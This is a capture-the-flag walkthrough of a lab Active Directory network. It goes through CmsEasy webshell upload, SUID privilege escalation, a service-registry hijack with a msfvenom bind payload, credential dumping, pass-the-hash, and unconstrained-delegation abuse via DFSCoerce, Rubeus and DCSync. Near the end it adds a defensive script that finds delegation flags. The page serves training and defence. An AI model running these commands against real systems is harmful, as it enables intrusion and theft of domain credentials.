春秋云镜-Delegation

  1. FLAG1
  2. FLAG2
  3. FLAG3&FLAG4

FLAG1

First, gather information on the target machine:

┌──(root㉿kali)-[~/Desktop/tmp]
└─# ../pentest/fscan/fscan2 -h 39.99.130.13
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0

[2025-04-17 22:29:55] [INFO] 暴力破解线程数: 1
[2025-04-17 22:29:55] [INFO] 开始信息扫描
[2025-04-17 22:29:55] [INFO] 最终有效主机数量: 1
[2025-04-17 22:29:55] [INFO] 开始主机扫描
[2025-04-17 22:29:55] [INFO] 有效端口数量: 233
[2025-04-17 22:29:56] [SUCCESS] 端口开放 39.99.130.13:22
[2025-04-17 22:29:56] [SUCCESS] 端口开放 39.99.130.13:21
[2025-04-17 22:29:56] [SUCCESS] 端口开放 39.99.130.13:3306
[2025-04-17 22:29:56] [SUCCESS] 端口开放 39.99.130.13:80
[2025-04-17 22:29:56] [SUCCESS] 服务识别 39.99.130.13:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-04-17 22:29:56] [SUCCESS] 服务识别 39.99.130.13:21 => [ftp] 版本:3.0.3 产品:vsftpd 系统:Unix Banner:[220 (vsFTPd 3.0.3).]
[2025-04-17 22:30:01] [SUCCESS] 服务识别 39.99.130.13:3306 => [mysql] 版本:8.0.29-0ubuntu0.20.04.3 产品:MySQL
[2025-04-17 22:30:01] [SUCCESS] 服务识别 39.99.130.13:80 => [http]
[2025-04-17 22:30:04] [INFO] 存活端口数量: 4
[2025-04-17 22:30:04] [INFO] 开始漏洞扫描
[2025-04-17 22:30:04] [INFO] 加载的插件: ftp, mysql, ssh, webpoc, webtitle
[2025-04-17 22:30:05] [SUCCESS] 网站标题 http://39.99.130.13 状态码:200 长度:68104 标题:中文网页标题

Port 80 runs CmsEasy; appending /admin to the URL shows version v7752, and known vulnerabilities for that version can be found online:

https://jdr2021.github.io/2021/10/14/CmsEasy_7.7.5_20211012%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%86%99%E5%85%A5%E5%92%8C%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E/

Both require logging into the admin backend; the weak credentials admin:123456 worked.

Send the request, then visit 1.php to confirm the file was written; write a one-line webshell and connect with 蚁剑 (AntSword).

The flag is under /home/flag/, but only root can read it, so spawn a reverse shell and prepare for privilege escalation:

www-data@localhost:/var/www/html$ find / -perm -u=s 2>/dev/null
find / -perm -u=s 2>/dev/null

/usr/bin/stapbpf
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/su
/usr/bin/chsh
/usr/bin/staprun
/usr/bin/at
/usr/bin/diff
/usr/bin/fusermount
/usr/bin/sudo
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/passwd
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device

diff has the SUID bit set, so it can be used to read flag01.txt.

FLAG2

A hint is also given:

Great job!!!!!!
Here is the hint: WIN19\Adrian
I'll do whatever I can to rock you...

Upload fscan and scan the internal network first, then set up a proxy tunnel:

www-data@localhost:/tmp$ ./fscan -h 172.22.4.36/24
./fscan -h 172.22.4.36/24
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0

[2025-04-18 11:04:32] [INFO] 暴力破解线程数: 1
[2025-04-18 11:04:32] [INFO] 开始信息扫描
[2025-04-18 11:04:32] [INFO] CIDR范围: 172.22.4.0-172.22.4.255
[2025-04-18 11:04:32] [INFO] 生成IP范围: 172.22.4.0.%!d(string=172.22.4.255) - %!s(MISSING).%!d(MISSING)
[2025-04-18 11:04:32] [INFO] 解析CIDR 172.22.4.36/24 -> IP范围 172.22.4.0-172.22.4.255
[2025-04-18 11:04:33] [INFO] 最终有效主机数量: 256
[2025-04-18 11:04:33] [INFO] 开始主机扫描
[2025-04-18 11:04:33] [INFO] 正在尝试无监听ICMP探测...
[2025-04-18 11:04:33] [INFO] 当前用户权限不足,无法发送ICMP包
[2025-04-18 11:04:33] [INFO] 切换为PING方式探测...
[2025-04-18 11:04:33] [SUCCESS] 目标 172.22.4.7 存活 (ICMP)
[2025-04-18 11:04:33] [SUCCESS] 目标 172.22.4.36 存活 (ICMP)
[2025-04-18 11:04:33] [SUCCESS] 目标 172.22.4.45 存活 (ICMP)
[2025-04-18 11:04:33] [SUCCESS] 目标 172.22.4.19 存活 (ICMP)
[2025-04-18 11:04:39] [INFO] 存活主机数量: 4
[2025-04-18 11:04:39] [INFO] 有效端口数量: 233
[2025-04-18 11:04:39] [SUCCESS] 端口开放 172.22.4.45:80
[2025-04-18 11:04:39] [SUCCESS] 端口开放 172.22.4.36:80
[2025-04-18 11:04:39] [SUCCESS] 端口开放 172.22.4.7:135
[2025-04-18 11:04:39] [SUCCESS] 端口开放 172.22.4.45:139
[2025-04-18 11:04:39] [SUCCESS] 端口开放 172.22.4.19:135
[2025-04-18 11:04:39] [SUCCESS] 端口开放 172.22.4.7:139
[2025-04-18 11:04:39] [SUCCESS] 端口开放 172.22.4.45:135
[2025-04-18 11:04:39] [SUCCESS] 端口开放 172.22.4.19:139
[2025-04-18 11:04:39] [SUCCESS] 端口开放 172.22.4.7:389
[2025-04-18 11:04:39] [SUCCESS] 端口开放 172.22.4.7:445
[2025-04-18 11:04:39] [SUCCESS] 端口开放 172.22.4.36:22
[2025-04-18 11:04:39] [SUCCESS] 端口开放 172.22.4.36:21
[2025-04-18 11:04:39] [SUCCESS] 端口开放 172.22.4.19:445
[2025-04-18 11:04:39] [SUCCESS] 端口开放 172.22.4.45:445
[2025-04-18 11:04:39] [SUCCESS] 端口开放 172.22.4.7:88
[2025-04-18 11:04:39] [SUCCESS] 端口开放 172.22.4.36:3306
[2025-04-18 11:04:39] [SUCCESS] 服务识别 172.22.4.36:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-04-18 11:04:40] [SUCCESS] 服务识别 172.22.4.36:21 => [ftp] 版本:3.0.3 产品:vsftpd 系统:Unix Banner:[220 (vsFTPd 3.0.3).]
[2025-04-18 11:04:40] [SUCCESS] 服务识别 172.22.4.36:3306 => [mysql] 版本:8.0.29-0ubuntu0.20.04.3 产品:MySQL Banner:[[.8.0.29-0ubuntu0.20.04.3 @.uoo ^_Z.Q.8Db#X \>; caching_sha2_password]
[2025-04-18 11:04:44] [SUCCESS] 服务识别 172.22.4.45:80 => [http]
[2025-04-18 11:04:44] [SUCCESS] 服务识别 172.22.4.45:139 => Banner:[.]
[2025-04-18 11:04:44] [SUCCESS] 服务识别 172.22.4.7:139 => Banner:[.]
[2025-04-18 11:04:44] [SUCCESS] 服务识别 172.22.4.19:139 => Banner:[.]
[2025-04-18 11:04:44] [SUCCESS] 服务识别 172.22.4.7:389 => [ldap] 产品:Microsoft Windows Active Directory LDAP 系统:Windows 信息:Domain: xiaorang.lab, Site: Default-First-Site-Name
[2025-04-18 11:04:44] [SUCCESS] 服务识别 172.22.4.7:445 =>
[2025-04-18 11:04:45] [SUCCESS] 服务识别 172.22.4.19:445 =>
[2025-04-18 11:04:45] [SUCCESS] 服务识别 172.22.4.45:445 =>
[2025-04-18 11:04:45] [SUCCESS] 服务识别 172.22.4.7:88 =>
[2025-04-18 11:04:48] [SUCCESS] 服务识别 172.22.4.36:80 => [http]
[2025-04-18 11:05:44] [SUCCESS] 服务识别 172.22.4.7:135 =>
[2025-04-18 11:05:44] [SUCCESS] 服务识别 172.22.4.19:135 =>
[2025-04-18 11:05:44] [SUCCESS] 服务识别 172.22.4.45:135 =>
[2025-04-18 11:05:44] [INFO] 存活端口数量: 16
[2025-04-18 11:05:44] [INFO] 开始漏洞扫描
[2025-04-18 11:05:44] [INFO] 加载的插件: findnet, ftp, ldap, ms17010, mysql, netbios, smb, smb2, smbghost, ssh, webpoc, webtitle
[2025-04-18 11:05:44] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.4.45
主机名: WIN19
发现的网络接口:
IPv4地址:
└─ 172.22.4.45
[2025-04-18 11:05:45] [SUCCESS] NetBios 172.22.4.45 XIAORANG\WIN19
[2025-04-18 11:05:45] [SUCCESS] 网站标题 http://172.22.4.45 状态码:200 长度:703 标题:IIS Windows Server
[2025-04-18 11:05:45] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.4.7
主机名: DC01
发现的网络接口:
IPv4地址:
└─ 172.22.4.7
[2025-04-18 11:05:45] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.4.19
主机名: FILESERVER
发现的网络接口:
IPv4地址:
└─ 172.22.4.19
[2025-04-18 11:05:45] [SUCCESS] NetBios 172.22.4.7 DC:DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[2025-04-18 11:05:45] [SUCCESS] NetBios 172.22.4.19 FILESERVER.xiaorang.lab Windows Server 2016 Standard 14393
[2025-04-18 11:05:45] [INFO] 系统信息 172.22.4.7 [Windows Server 2016 Datacenter 14393]
[2025-04-18 11:05:45] [SUCCESS] 网站标题 http://172.22.4.36 状态码:200 长度:68100 标题:中文网页标题

The hint from flag1 says there is an Adrian user on the WIN19 machine and the password is in rockyou:

SMB         172.22.4.45     445    WIN19            [-] WIN19\Adrian:babygirl1 STATUS_PASSWORD_EXPIRED

You have to look closely here: the tool will not point out that the password has expired. Log in over RDP and change the password:

rdesktop 172.22.4.45

There is a PrivescCheck folder on the desktop. PrivescCheck is a privilege-escalation enumeration tool; it has already been run and left an HTML report, which can be opened directly.

It reports two High findings: the first, WSUS, is more often used for lateral movement; the second is a registry finding, where the user has write, start and stop permissions on the gupdate service.

Generate a bind-shell payload with msf:

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=9999 -f exe -o bind.exe
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set LPORT 9999
set RHOST 172.22.4.45
run

Upload the payload, modify the registry, and start the service manually:

sc start gupdate

This shell disconnects quickly, so migrate into another process:

ps
migrate PID

For some reason my msf shell would not start; dump the hashes:

load kiwi
creds_all
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username Domain NTLM SHA1
-------- ------ ---- ----
Adrian WIN19 4ba5d16eb261eb61148ab5264f457cbb 9a712bd84b09123d36da74d9d5ac255c027588eb
WIN19$ XIAORANG d41fef724adf6f2ed2cbb5a4ebd186c9 af156e5c6afc93b1a648040bd59f7d5cab23d81a
WIN19$ XIAORANG 5943c35371c96f19bda7b8e67d041727 5a4dc280e89974fdec8cf1b2b76399d26f39b8f8

wdigest credentials
===================

Username Domain Password
-------- ------ --------
(null) (null) (null)
Adrian WIN19 (null)
WIN19$ XIAORANG (null)

kerberos credentials
====================

Username Domain Password
-------- ------ --------
(null) (null) (null)
Adrian WIN19 (null)


hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:ba21c629d9fd56aff10c3e826323e6ab:::
Adrian:1003:aad3b435b51404eeaad3b435b51404ee:4ba5d16eb261eb61148ab5264f457cbb:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:44d8d68ed7968b02da0ebddafd2dd43e:::

Log in as Administrator:

┌──(root㉿kali)-[~/Desktop/tmp]
└─# impacket-wmiexec -hashes aad3b435b51404eeaad3b435b51404ee:ba21c629d9fd56aff10c3e826323e6ab Administrator@172.22.4.45
C:\>type C:\Users\Administrator\flag\flag02.txt

FLAG3&FLAG4

Add a new user:

net user lv Asd123132 /add
net localgroup administrators lv /add

Check the delegation relationships in the domain:

C:\Users\lv\Desktop>Adinfo_win.exe -d="xiaorang.lab" --dc="172.22.4.7" -u="WIN19$" -H="d41fef724adf6f2ed2cbb5a4ebd186c9"

_____ _ __
/\ | __ \(_) / _|
/ \ | | | |_ _ __ | |_ ___
/ /\ \ | | | | | '_ \| _/ _ \ Tools that collect information from domain
/ ____ \| |__| | | | | | || (_) |
/_/ \_\_____/|_|_| |_|_| \___/ v1.5 by lzz

[i] Try to connect '172.22.4.7'
[c] Auth Domain: xiaorang.lab
[c] Auth user: WIN19$
[c] Auth hash: d41fef724adf6f2ed2cbb5a4ebd186c9
[c] connected successfully,try to dump domain info
[i] DomainVersion found!
[+] Windows 2016 Server operating system
[i] Domain SID:
[+] S-1-5-21-1913786442-1328635469-1954894845
[i] Domain MAQ found
[+] 10
[i] Domain Account Policy found
[+] pwdHistory: 24
[+] minPwdLength: 7
[+] minPwdAge: 1(day)
[+] maxPwdAge: 42(day)
[+] lockoutThreshold: 0
[+] lockoutDuration: 30(min)
[i] Domain Controllers: 1 found
[+] DC01$ ==>>> Windows Server 2016 Datacenter [10.0 (14393)] ==>>> 172.22.4.7
[i] ADCS has not found!
[i] Domain Exchange Server: 0 found
[i] Domain All DNS:
[+] Domain Dns 3 found,Saved in All_DNS.csv
[i] Domain Trusts: 0 found
[i] SPN: 39 found
[i] Domain GPOs: 2 found
[i] Domain Admins: 1 users found
[+]Administrator
[i] Enterprise Admins: 1 users found
[+]Administrator
[i] administrators: 1 users found
[+]Administrator
[i] Backup Operators: 0 users found
[i] Users: 6 found
[i] User with Mail: 0 found
[i] Only_name_and_Useful_Users: 3 found
[i] Only_admincount=1_andUseful_Users: 1 found
[i] Locked Users: 0 found
[i] Disabled Users: 3 found
[i] Users with passwords not set to expire: 2 found
[i] Domain Computers: 5 found
[i] Only_name_and_Useful_computers: 5 found
[i] Groups: 49 found
[i] Domain OUs: 1 found
[i] LAPS Not found
[i] LAPS passwords: 0 found
[i] SensitiveDelegate Users: 0 found
[i] AsReproast Users: 0 found
[i] Kerberoast Users: 1 found
[+] CN=krbtgt,CN=Users,DC=xiaorang,DC=lab ==>>> kadmin/changepw
[i] SIDHistory Users: 0 found
[i] CreatorSID Users: 2 found
[+] WIN-3X7U15C2XDM$ ==>>> Marcus
[+] WIN-YUUAW2QG9MF$ ==>>> Marcus
[i] RBCD Users: 0 found
[i] Unconstrained Deligation Users: 1 found
[+] WIN19$
[i] Constrained Deligation Users: 0 found
[i] Krbtgt password last set time: 2022-06-22 22:54:34 +0800 CST
[i] CSVs written to 'csv' directory in C:\Users\lv\Desktop
[i] Execution took 1.0246743s
[i] Unconstrained Deligation Users: 1 found
[+] WIN19$

WIN19$ has unconstrained delegation, so upload Rubeus and monitor for incoming TGTs:

Rubeus.exe monitor /interval:1 /filteruser:DC01$
C:\Users\lv\Desktop>Rubeus.exe monitor /interval:1 /filteruser:DC01$

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.0

[*] Action: TGT Monitoring
[*] Target user : DC01$
[*] Monitoring every 1 seconds for new TGTs


Then use dfscoerce to make the DC authenticate to WIN19$:

┌──(root㉿kali)-[~/Desktop/tmp]
└─# proxy -f proxychains4.conf -q python3 ../script/AD/dfscoerce.py -u "WIN19$" -hashes :d41fef724adf6f2ed2cbb5a4ebd186c9 -d xiaorang.lab WIN19 172.22.4.7
[-] Connecting to ncacn_np:172.22.4.7[\PIPE\netdfs]
[+] Successfully bound!
[-] Sending NetrDfsRemoveStdRoot!
NetrDfsRemoveStdRoot
ServerName: 'WIN19\x00'
RootShare: 'test\x00'
ApiFlags: 1


DFSNM SessionError: code: 0x490 - ERROR_NOT_FOUND - Element not found.
C:\Users\lvv\Desktop>Rubeus.exe monitor /interval:1 /filteruser:DC01$

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.0

[*] Action: TGT Monitoring
[*] Target user : DC01$
[*] Monitoring every 1 seconds for new TGTs


[*] 2025/4/18 4:54:32 UTC - Found new TGT:

User : DC01$@XIAORANG.LAB
StartTime : 2025/4/18 10:28:04
EndTime : 2025/4/18 20:28:04
RenewTill : 2025/4/25 10:28:04
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket :


[*] Ticket cache size: 1

Import the TGT and then DCSync:

Rubeus.exe ptt /ticket:<base64 ticket from the monitor output above>
mimikatz.exe "lsadump::dcsync /all /csv"
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502 krbtgt 767e06b9c74fd628dd13785006a9092b 514
1105 Aldrich 98ce19dd5ce74f670d230c7b1aa016d0 512
1106 Marcus b91c7cc463735bf0e599a2d0a04df110 512
1112 WIN-3X7U15C2XDM$ c3ddf0ffd17c48e6c40e6eda9c9fbaf7 4096
1113 WIN-YUUAW2QG9MF$ 125d0e9790105be68deb6002690fc91b 4096
1000 DC01$ 23414273a692373e6e076d5fdbb2c213 532480
500 Administrator 4889f6553239ace1f7c47fa2c619c252 512
1103 FILESERVER$ dd213f63df5b16b2daa567705ca88ac7 4096
1104 WIN19$ b6547b5e9c27c42b5cb096f1c922bc3a 528384

This yields the hashes of the domain controller account and the rest of the domain.
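The delegation finding from Adinfo and the last column of the dcsync output are the same fact seen twice: the decimal userAccountControl value. As an added example (not code from the writeup or from either tool), the script below decodes that value and lists accounts trusted for unconstrained delegation that are not domain controllers, which is the check a domain audit should run before an attacker does; the sample rows are copied from the dcsync output on this page.

```python
import re

# userAccountControl bits as documented by Microsoft (MS-SAMR / MS-ADTS).
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",          # domain controller computer account
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",       # unconstrained delegation
    0x100000: "NOT_DELEGATED",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}

# Rows from the writeup's `lsadump::dcsync /all /csv` output (lab values
# from the page, embedded here as constructed input): rid name ntlm uac.
SAMPLE_CSV = """\
502 krbtgt 767e06b9c74fd628dd13785006a9092b 514
1000 DC01$ 23414273a692373e6e076d5fdbb2c213 532480
500 Administrator 4889f6553239ace1f7c47fa2c619c252 512
1103 FILESERVER$ dd213f63df5b16b2daa567705ca88ac7 4096
1104 WIN19$ b6547b5e9c27c42b5cb096f1c922bc3a 528384
"""

ROW = re.compile(r"^(\d+)\s+(\S+)\s+([0-9a-fA-F]{32})\s+(\d+)$")


def parse_rows(text):
    """Parse mimikatz CSV rows; lines that are not rows (banner text) are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            rows.append({"rid": int(m[1]), "name": m[2], "uac": int(m[4])})
    return rows


def decode_uac(value):
    """Return the names of all set flags, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def unconstrained_delegation(rows):
    """Accounts with TRUSTED_FOR_DELEGATION that are not domain controllers.

    DCs always carry the flag (DC01$ here), so only non-DC accounts are
    reported; each one is a host where any incoming TGT can be reused.
    """
    hits = []
    for r in rows:
        flags = decode_uac(r["uac"])
        if "TRUSTED_FOR_DELEGATION" in flags and "SERVER_TRUST_ACCOUNT" not in flags:
            hits.append(r["name"])
    return hits
```

Clearing the flag on WIN19$ (or moving privileged accounts into Protected Users, which blocks delegation) removes the path used in this section.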

Then log in and read the flag:

C:\Users\Administrator\flag> type flag04.txt